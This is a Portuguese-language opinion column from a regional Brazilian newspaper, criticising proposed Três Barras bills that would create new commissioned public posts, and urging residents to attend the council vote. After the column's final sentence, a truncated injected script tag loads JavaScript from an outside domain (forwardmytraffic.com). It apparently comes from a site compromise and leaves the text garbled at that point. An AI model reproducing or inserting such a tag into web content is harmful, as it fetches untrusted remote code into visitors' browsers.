InícioColunasCargos Comissionados

Cargos Comissionados

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

A Câmara de Vereadores de Três Barras irá deliberar na próxima segunda feira os Projetos de Leis Complementares 03/2018 e 04/2018 que tem por objeto a criação de novos cargos na prefeitura e na SAMASA. O custo desse novo cabide de empregos públicos será em torno de 720 mil reais anuais. O engraçado, é que é o mesmo prefeito que declarou ter recebido uma dívida milionária da gestão anterior. Todo bom gestor sabe que quando o passivo é grande, não se pode adquirir novas despesas. Mas somente bons gestores sabem disso, bons políticos não sabem.

 

Na primeira tentativa de votação, houve um pedido de vistas por parte de um vereador da base aliada do executivo. Pedido este muito oportuno, tendo em vista que faltavam naquela casa legislativa dois vereadores que em tese seriam a favor do projeto.

 

 

A seção estava cheia. A população compareceu em massa para pedir que os projetos fossem recusados pelo parlamento. Alguns edis usaram a tribuna para defenderem seus posicionamentos. Mas o pedido de vista pegou todos de surpresa. Obviamente foi uma estratégia política para ganhar tempo e assim permitir que o executivo negocie com os vereadores a aprovação.

 

Do ponto de vista jurídico, é muito difícil ou quase impossível, conseguir impedir o progresso desses projetos, somente através da pressão popular, por isso, é importante a presença de toda a população na próxima segunda feira às 19hrs na Câmara de Vereadores.

 

 

Não podemos permitir que os administradores do município façam o que quiserem como dinheiro do público, criando cargos e mais cargos para seus afilhados partidários ou para usar como moeda troca para conseguir apoio político.

 

 

Na atual crise financeira vivida pelo estado brasileiro em todos os seus entes, chega a ser incoerente criar novos custos dessa maneira.

 

 

Alguns desavisados dizem que são necessárias que sejam criadas tais vagas, pois a cidade tem alto nível de desemprego. Prefeitura não é instituição de caridade, prefeitura não gera emprego, prefeitura é para servir e administrar. Por esse motivo é composta por servidores públicos.

 

 

Vamos esperar e ver se os nobres edis irão votar pelo povo ou pelo prefeito…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.